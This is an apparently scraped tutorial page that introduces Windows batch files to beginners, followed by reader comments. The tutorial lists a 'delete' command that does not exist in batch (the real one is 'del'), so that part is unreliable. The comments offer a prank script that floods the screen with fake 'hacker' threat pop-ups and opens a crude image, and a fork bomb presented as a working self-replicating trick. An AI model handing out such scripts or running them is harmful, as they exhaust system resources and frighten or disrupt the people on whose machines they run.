Remove these ads by
Signing UpStep 1: The basics
batch files are files similar t programs, while these are not programs, they do a lot that a program can do, and are the backbone of all programs. Any batch file is stored with the file extension/type .bat, you should always remember this. basic commands
start-starts a program
ex: start monkeys.bat
delete-deletes a program
ex: delete monkeys.bat
color-changes the current color of the command prompt window
ex: color 0A (changes background to black, and lettering to green)
help-displays all of the current available commands, and gives more information on a topic if you type it before the command
ex: help start (shows parameters and uses of the command start)












































Visit Our Store »
Go Pro Today »




If you try alternate command interpreters, like Take Command(TC), it's may working
my batch is down there
@echo off
msg * hello
msg * who
msg * are
msg * you
msg * im
msg * the
msg * hacker
msg * youve
msg * been
msg * very
msg * bad
msg * so
msg * im
msg * going
msg * to
msg * teach
msg * you
msg * a
msg * lesson!
start http://www.fugly.com/media/IMAGES/WTF/fat-guy-in-a-diaper.jpg
msg * hello
msg * who
msg * are
msg * you
msg * im
msg * the
msg * hacker
msg * youve
msg * been
msg * very
msg * bad
msg * so
msg * im
msg * going
msg * to
msg * teach
msg * you
msg * a
msg * lesson!
ping localhost -n 30 >nul
start http://www.fugly.com/media/IMAGES/WTF/fat-guy-in-a-diaper.jpg
This should work
because there isn't damage to your computer
===================
:s
%0
goto :s
If you are even going to try this, do it in a folder! It is a fork bomb, but every time it opens, it creates a copy of itself!